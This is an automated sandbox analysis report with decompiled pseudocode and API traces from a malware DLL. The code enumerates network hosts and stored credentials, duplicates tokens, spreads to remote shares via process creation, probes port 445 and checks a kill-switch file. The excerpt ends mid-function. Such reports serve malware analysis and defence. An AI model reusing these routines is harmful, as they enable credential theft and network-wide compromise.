    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 80%
    			E011E7C10() {
    				char _v8;
    				char _v528;
    				char* _t10;
    				void* _t18;
    				void* _t21;
    
    				_t18 =  *0x11ff140; // 0x2e8160
    				E011E6FC7(L"127.0.0.1", 1);
    				E011E6FC7(L"localhost", 1, _t18);
    				_t10 =  &_v528;
    				_v8 = 0x104;
    				__imp__GetComputerNameExW(4, _t10,  &_v8);
    				if(_t10 != 0) {
    					E011E6FC7( &_v528, 1, _t18);
    				}
    				CreateThread(0, 0, E011E8E7F, _t18, 0, 0); // executed
    				_t21 = 0;
    				L3:
    				E011E777B(_t18); // executed
    				E011E786B(_t18); // executed
    				if(_t21 == 0) {
    					E011E795A(_t18, 0x80000000, 0); // executed
    					_t21 = 1;
    				}
    				Sleep(0x2bf20); // executed
    				goto L3;
    			}
    APIs
    • GetComputerNameExW.KERNEL32(00000004,?,?,002E8160,002E8160), ref: 011E7C4F
    • CreateThread.KERNEL32(00000000,00000000,Function_00008E7F,002E8160,00000000,00000000), ref: 011E7C71
      • Part of subcall function 011E777B: LoadLibraryW.KERNEL32(iphlpapi.dll), ref: 011E7789
      • Part of subcall function 011E777B: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable,002E8160,00000000), ref: 011E77A2
      • Part of subcall function 011E777B: GetProcessHeap.KERNEL32(00000008,00100000), ref: 011E77BD
      • Part of subcall function 011E777B: RtlAllocateHeap.NTDLL(00000000), ref: 011E77C4
      • Part of subcall function 011E777B: wsprintfW.USER32 ref: 011E781B
      • Part of subcall function 011E777B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7844
      • Part of subcall function 011E777B: HeapFree.KERNEL32(00000000), ref: 011E784B
      • Part of subcall function 011E777B: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011E7C7F), ref: 011E7853
      • Part of subcall function 011E777B: FreeLibrary.KERNEL32(002E8160), ref: 011E785C
      • Part of subcall function 011E786B: GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E7887
      • Part of subcall function 011E786B: GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 011E78A5
      • Part of subcall function 011E786B: HeapAlloc.KERNEL32(00000000), ref: 011E78AC
      • Part of subcall function 011E786B: GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E78C5
      • Part of subcall function 011E786B: wsprintfW.USER32 ref: 011E7917
      • Part of subcall function 011E786B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7943
      • Part of subcall function 011E786B: HeapFree.KERNEL32(00000000), ref: 011E794A
    • Sleep.KERNELBASE(0002BF20,002E8160,002E8160), ref: 011E7C9D
      • Part of subcall function 011E795A: NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,002E8160,?,002E8160,?,002E8160,00000000,002E8160), ref: 011E798B
      • Part of subcall function 011E795A: NetApiBufferFree.NETAPI32(?), ref: 011E7A08
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 44%
    			E011E9F8E() {
    				void* _v8;
    				void* _v12;
    				intOrPtr _v16;
    				short _v48;
    				void* __esi;
    				int _t21;
    				intOrPtr _t22;
    				void* _t33;
    				char* _t46;
    
    				_v8 = 0;
    				_v12 = 0;
    				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v8);
    				_t48 = _t21;
    				if(_t21 != 0) {
    					DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v12);
    				}
    				_t22 =  *0x11ff140; // 0x2e8160
    				_v16 = _t22;
    				_t46 = E011E7091(0x24, E011E6EDA, 0, 0xffff);
    				E011E7A17(_t46, 0); // executed
    				E011E7B31(_t46);
    				E011E70FA(_t46);
    				_t43 = _t46;
    				_t42 = E011E6F40(_t46, _t48,  &_v48);
    				if(_t28 != 0) {
    					do {
    						_t33 = E011E9987( &_v48, 0, 0, 0); // executed
    						if(_t33 != 0) {
    							E011E6F91( &_v48, _t46, _t42);
    							_t43 =  &_v48;
    							E011E6F91( &_v48, _v16, 0);
    						}
    						_v48 = 0;
    					} while (E011E6F02(_t43,  &_v48) != 0);
    					E011E6F78(_t42);
    				}
    				if(_v8 != 0) {
    					CloseHandle(_v8);
    					_v8 = 0;
    				}
    				if(_v12 != 0) {
    					CloseHandle(_v12);
    				}
    				return 0;
    			}
    APIs
    • GetCurrentThread.KERNEL32(0000000B,00000001,?), ref: 011E9FA7
    • OpenThreadToken.ADVAPI32(00000000), ref: 011E9FAE
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E9FC9
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70A1
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70AA
      • Part of subcall function 011E7091: InitializeCriticalSection.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70B3
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70DE
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70E1
      • Part of subcall function 011E7A17: WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 011E7A3C
      • Part of subcall function 011E7A17: GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 011E7A50
      • Part of subcall function 011E7A17: memset.MSVCRT ref: 011E7A6B
      • Part of subcall function 011E7A17: WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 011E7A7F
      • Part of subcall function 011E7A17: GlobalFree.KERNEL32(00000000), ref: 011E7B18
      • Part of subcall function 011E7A17: WNetCloseEnum.MPR(0000FFFF), ref: 011E7B21
      • Part of subcall function 011E7B31: CredEnumerateW.ADVAPI32(00000000,00000000,?,?), ref: 011E7B4A
      • Part of subcall function 011E7B31: CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 011E7C02
      • Part of subcall function 011E70FA: EnterCriticalSection.KERNEL32(002E6710,011E7EBD), ref: 011E70FF
      • Part of subcall function 011E70FA: InterlockedExchange.KERNEL32(002E6738,00000001), ref: 011E710B
      • Part of subcall function 011E70FA: LeaveCriticalSection.KERNEL32(002E6710), ref: 011E7112
    • CloseHandle.KERNEL32(?), ref: 011EA068
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E99D1
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A2A
      • Part of subcall function 011E9987: WNetAddConnection2W.MPR(?,?,?,00000000), ref: 011E9A4C
      • Part of subcall function 011E9987: wsprintfW.USER32 ref: 011E9A6A
      • Part of subcall function 011E9987: PathFindExtensionW.SHLWAPI(?), ref: 011E9A77
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9A8E
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9A98
      • Part of subcall function 011E9987: GetLastError.KERNEL32(?,00000001), ref: 011E9AC3
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9B0C
      • Part of subcall function 011E9987: GetCurrentThread.KERNEL32(00000002,00000001,?,?,00000001), ref: 011E9B54
      • Part of subcall function 011E9987: OpenThreadToken.ADVAPI32(00000000), ref: 011E9B5B
      • Part of subcall function 011E9987: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 011E9B78
      • Part of subcall function 011E9987: memset.MSVCRT ref: 011E9BB1
      • Part of subcall function 011E9987: CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C70
      • Part of subcall function 011E9987: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C78
      • Part of subcall function 011E9987: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9C8C
      • Part of subcall function 011E9987: GetExitCodeProcess.KERNEL32(?,?), ref: 011E9C9F
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CB5
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CC1
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CCD
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CD9
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9CE5
      • Part of subcall function 011E9987: PathFileExistsW.SHLWAPI(?), ref: 011E9D1F
      • Part of subcall function 011E9987: GetLastError.KERNEL32 ref: 011E9D2B
      • Part of subcall function 011E9987: DeleteFileW.KERNEL32(?), ref: 011E9D52
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D62
      • Part of subcall function 011E9987: CloseHandle.KERNEL32(?), ref: 011E9D76
      • Part of subcall function 011E9987: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9D8F
      • Part of subcall function 011E9987: SetLastError.KERNEL32(00000057,00000000,?,?,?,011EA0C9,?,00000000,00000000,00000000), ref: 011E9DB0
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
    • CloseHandle.KERNEL32(?), ref: 011EA05B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E122D(CHAR* _a4, intOrPtr* _a8) {
    				long _v8;
    				void _v156;
    				void* _t8;
    				int _t11;
    				signed int _t15;
    				signed int _t17;
    				void* _t21;
    				signed int _t22;
    
    				_t22 = 0;
    				_v8 = 0;
    				if(_a4 != 0) {
    					_t8 = CreateFileA(_a4, 0x80100000, 3, 0, 3, 0, 0); // executed
    					_t21 = _t8;
    					if(_t21 != 0xffffffff) {
    						_t11 = DeviceIoControl(_t21, 0x70048, 0, 0,  &_v156, 0x90,  &_v8, 0); // executed
    						if(_t11 != 0) {
    							 *_a8 = _v156;
    						} else {
    							_t15 = GetLastError();
    							if(_t15 > 0) {
    								_t15 = _t15 & 0x0000ffff | 0x80070000;
    							}
    							_t22 = _t15;
    						}
    						CloseHandle(_t21);
    					} else {
    						_t17 = GetLastError();
    						if(_t17 > 0) {
    							_t17 = _t17 & 0x0000ffff | 0x80070000;
    						}
    						_t22 = _t17;
    					}
    					return _t22;
    				}
    				return 0x80070057;
    			}
    APIs
    • CreateFileA.KERNEL32(?,80100000,00000003,00000000,00000003,00000000,00000000), ref: 011E125B
    • GetLastError.KERNEL32 ref: 011E1268
    • DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,00000000,00000000), ref: 011E1299
    • GetLastError.KERNEL32 ref: 011E12A3
    • CloseHandle.KERNEL32(00000000), ref: 011E12C7
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • socket.WS2_32(00000002,00000001,00000006), ref: 011E6737
    • ioctlsocket.WS2_32(00000000,8004667E,000001BD), ref: 011E674C
    • htons.WS2_32(00058778), ref: 011E6784
    • inet_addr.WS2_32(002F1C10), ref: 011E6791
    • connect.WS2_32(00000000,?,00000010), ref: 011E67A1
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 75%
    			E011E96C7(short* _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed int _v8;
    				char _v268;
    				char _v788;
    				WCHAR* _t20;
    				char* _t23;
    				intOrPtr* _t24;
    				void* _t29;
    				void* _t31;
    				signed int _t32;
    				intOrPtr _t33;
    				void* _t35;
    				void* _t36;
    				intOrPtr _t37;
    				intOrPtr _t38;
    
    				_v8 = _v8 & 0x00000000;
    				_t38 =  *0x11ff11c; // 0x58778
    				_t37 =  *0x11ff0fc; // 0x2f1c10
    				if(( *0x11ff104 & 0x00000004) == 0) {
    					L10:
    					return _v8;
    				}
    				_t20 = PathFindFileNameW("C:\Users\luketaylor\Desktop\abc.dll");
    				if(_t20 == 0) {
    					goto L10;
    				}
    				_t35 =  &_v788 - _t20;
    				do {
    					_t32 =  *_t20 & 0x0000ffff;
    					 *(_t35 + _t20) = _t32;
    					_t20 =  &(_t20[1]);
    				} while (_t32 != 0);
    				WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v268, 0x104, 0, 0);
    				_t23 =  &_v268;
    				__imp__#11(_t23);
    				if(_t23 != 0xffffffff) {
    					L6:
    					_t24 =  &_v788;
    					_t36 = _t24 + 2;
    					do {
    						_t33 =  *_t24;
    						_t24 = _t24 + 2;
    						_t45 = _t33;
    					} while (_t33 != 0);
    					_t29 = E011E668A(_t33, _t45,  &_v268, _t37, _t38, _a8, _a12,  &_v788, _t24 - _t36 >> 1); // executed
    					if(_t29 == 0) {
    						_v8 = 1;
    					}
    					goto L10;
    				}
    				_t31 = E011E9683( &_v268,  &_v268); // executed
    				if(_t31 == 0) {
    					goto L10;
    				}
    				goto L6;
    			}

    APIs
    • PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E96F4
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 011E9735
    • inet_addr.WS2_32(?), ref: 011E9742
      • Part of subcall function 011E668A: memset.MSVCRT ref: 011E669A
      • Part of subcall function 011E668A: GetTickCount.KERNEL32(?,002F1C10,00058778), ref: 011E66A2
      • Part of subcall function 011E9683: gethostbyname.WS2_32(011E9759), ref: 011E968C
      • Part of subcall function 011E9683: wsprintfA.USER32 ref: 011E96B6
    Strings
    • C:\Users\luketaylor\Desktop\abc.dll, xrefs: 011E96EF
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 37%
    			E011E9683(void* __eax, CHAR* _a4) {
    				void* _t16;
    
    				_t16 = 0; // executed
    				__imp__#52(_a4); // executed
    				if(__eax != 0) {
    					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
    					_t16 = 1;
    				}
    				return _t16;
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • memset.MSVCRT ref: 011E68AE
    • select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
    • send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E8946(long __ebx, WCHAR* _a4, void* _a8, long _a12) {
    				void* _t11;
    				int _t14;
    				void* _t17;
    				struct _OVERLAPPED* _t18;
    
    				_t18 = 0;
    				_t11 = CreateFileW(_a4, 0x40000000, 0, 0, (0 | _a12 != 0x00000000) + 1, 0, 0); // executed
    				_t17 = _t11;
    				if(_t17 != 0xffffffff) {
    					_t14 = WriteFile(_t17, _a8, __ebx,  &_a12, 0); // executed
    					if(_t14 != 0 && _a12 == __ebx) {
    						_t18 = 1;
    					}
    					CloseHandle(_t17);
    				}
    				return _t18;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 011E8963
    • WriteFile.KERNEL32(00000000,01442A10,?,011E8A84,00000000), ref: 011E897A
    • CloseHandle.KERNEL32(00000000), ref: 011E898B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E73AE(long __ebx, long _a4, void* _a8) {
    				void* _t6;
    				int _t9;
    				void* _t12;
    				struct _OVERLAPPED* _t13;
    
    				_t13 = 0;
    				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
    				_t12 = _t6;
    				if(_t12 != 0xffffffff) {
    					_a4 = 0;
    					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
    					if(_t9 != 0 && __ebx == _a4) {
    						_t13 = 1;
    					}
    					CloseHandle(_t12);
    				}
    				return _t13;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 011E73C4
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011E73DE
    • CloseHandle.KERNEL32(00000000), ref: 011E73EF
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 61%
    			E011E835E(void* __eflags) {
    				short _v1564;
    				int _t10;
    				void* _t12;
    				signed int _t15;
    
    				_t15 = 0;
    				if(E011E8320( &_v1564) != 0) {
    					_t10 = PathFileExistsW( &_v1564); // executed
    					_push(0);
    					if(_t10 != 0) {
    						ExitProcess();
    					}
    					_t12 = CreateFileW( &_v1564, 0x40000000, 0, 0, 2, 0x4000000, ??); // executed
    					_t15 = 0 | _t12 != 0xffffffff;
    				}
    				return _t15;
    			}

    APIs
      • Part of subcall function 011E8320: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E832B
      • Part of subcall function 011E8320: PathCombineW.SHLWAPI(011E7DC9,C:\Windows\,00000000), ref: 011E833A
      • Part of subcall function 011E8320: PathFindExtensionW.SHLWAPI(011E7DC9), ref: 011E8347
    • PathFileExistsW.SHLWAPI(?), ref: 011E8381
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,04000000,00000000), ref: 011E83A1
    • ExitProcess.KERNEL32(00000000), ref: 011E83B6
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E7167(signed int* __ebx, struct _CRITICAL_SECTION* __esi, intOrPtr* _a4) {
    				void* _t13;
    				intOrPtr _t15;
    				signed int* _t16;
    				signed int _t17;
    				signed int _t20;
    				intOrPtr* _t21;
    				void* _t23;
    				struct _CRITICAL_SECTION* _t26;
    
    				_t26 = __esi;
    				_t16 = __ebx;
    				if(__ebx == 0 || __esi == 0) {
    					return 0;
    				} else {
    					while(1) {
    						_t23 = 0;
    						EnterCriticalSection(_t26);
    						do {
    							_t17 =  *_t16;
    							_t1 = _t26 + 0x24; // 0x0
    							if(_t17 >=  *_t1) {
    								break;
    							}
    							_t2 = _t26 + 0x18; // 0x34c698
    							_t15 =  *((intOrPtr*)( *_t2 + _t17 * 4));
    							_t20 =  *(_t15 + 4);
    							if(_t20 == 0 || (_t16[1] & _t20) != 0) {
    								_t21 = _a4;
    								_t23 = 1;
    								if(_t21 != 0) {
    									 *_t21 = _t15;
    								}
    							} else {
    								_t23 = 0;
    							}
    							 *_t16 = _t17 + 1;
    						} while (_t23 == 0);
    						LeaveCriticalSection(_t26);
    						_t13 = _t23;
    						if(_t23 != 0) {
    							L14:
    							return _t13;
    						}
    						_t10 = _t26 + 0x28; // 0x1
    						if( *_t10 != 0) {
    							goto L14;
    						}
    						Sleep(0x2710); // executed
    					}
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
    • LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
    • Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011EA274(void* __eflags, void* _a4) {
    				short _v36;
    				void* _t13;
    				void* _t21;
    				char* _t22;
    				void* _t23;
    
    				_t23 = __eflags;
    				_t21 = _a4;
    				Sleep( *_t21);
    				_t22 =  *0x11ff140; // 0x2e8160
    				_t20 = _t22;
    				_t19 = E011E6F40(_t22, _t23,  &_v36);
    				if(_t8 != 0) {
    					do {
    						_t13 = E011E9DC3( &_v36); // executed
    						if(_t13 != 0) {
    							_t20 =  &_v36;
    							E011E6F91( &_v36, _t22, _t19);
    						}
    						_v36 = 0;
    					} while (E011E6F02(_t20,  &_v36) != 0);
    					E011E6F78(_t19);
    				}
    				HeapFree(GetProcessHeap(), 0, _t21);
    				return 0;
    			}

    APIs
    • Sleep.KERNELBASE(?), ref: 011EA282
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 011EA2D2
    • HeapFree.KERNEL32(00000000), ref: 011EA2D9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 51%
    			E011E8282(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
    				void* _v8;
    				signed int _t17;
    				void** _t19;
    				void* _t20;
    				signed int _t22;
    				signed int* _t23;
    				signed int* _t24;
    				void* _t26;
    				void* _t27;
    				signed int _t31;
    				signed int _t32;
    				signed int _t33;
    				signed int* _t37;
    				signed int* _t38;
    				void* _t39;
    				signed int _t40;
    				signed int _t42;
    				signed int _t43;
    
    				_t17 = E011E6973();
    				_t40 = _t17;
    				_t19 =  &_v8;
    				asm("sbb esi, esi");
    				_t27 = 0;
    				_t2 = _t40 - 0x55; // -85
    				_t43 = _t42 & _t2;
    				_v8 = 0;
    				__imp__NetServerGetInfo(0, 0x65, _t19, 0x55, _t39, _t42, _t26, __ecx); // executed
    				_t20 = _v8;
    				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
    					_t27 = 1;
    				}
    				if(_t20 != 0) {
    					NetApiBufferFree(_t20);
    				}
    				if(_t27 != 0) {
    					_t40 = _t40 + 0xf;
    				}
    				_t31 = 3;
    				_t22 = _t40 / _t31;
    				if(_t40 <= 0x55) {
    					_t32 = 0xf;
    					_t12 = _t40 - 0xf; // -15
    					asm("sbb ecx, ecx");
    					_t33 = _t32 & _t12;
    				} else {
    					_t33 = 0x46;
    				}
    				if(_t40 > 0xf) {
    					_t40 = 0xf;
    				}
    				_t37 = _a4;
    				if(_t37 != 0) {
    					 *_t37 = _t43;
    				}
    				_t38 = _a12;
    				if(_t38 != 0) {
    					 *_t38 = _t22;
    				}
    				_t23 = _a16;
    				if(_t23 != 0) {
    					 *_t23 = _t33;
    				}
    				_t24 = _a8;
    				if(_t24 != 0) {
    					 *_t24 = _t40;
    				}
    				return _t24;
    			}

    APIs
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • NetServerGetInfo.NETAPI32(00000000,00000065,?,00000000,00000000,76E6DE72,?,?,011E8029,000000FF,?,?,?), ref: 011E82A8
    • NetApiBufferFree.NETAPI32(?,?,?,011E8029,000000FF,?,?,?), ref: 011E82C1
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 68%
    			E011E795A(intOrPtr _a4, intOrPtr _a8, void* _a12) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				void* __esi;
    				void** _t30;
    				void* _t40;
    				void* _t42;
    				intOrPtr* _t43;
    				void* _t44;
    
    				_t44 = 0;
    				_t30 =  &_v8;
    				_v8 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
    				if(_t30 == 0 || _t30 == 0xea) {
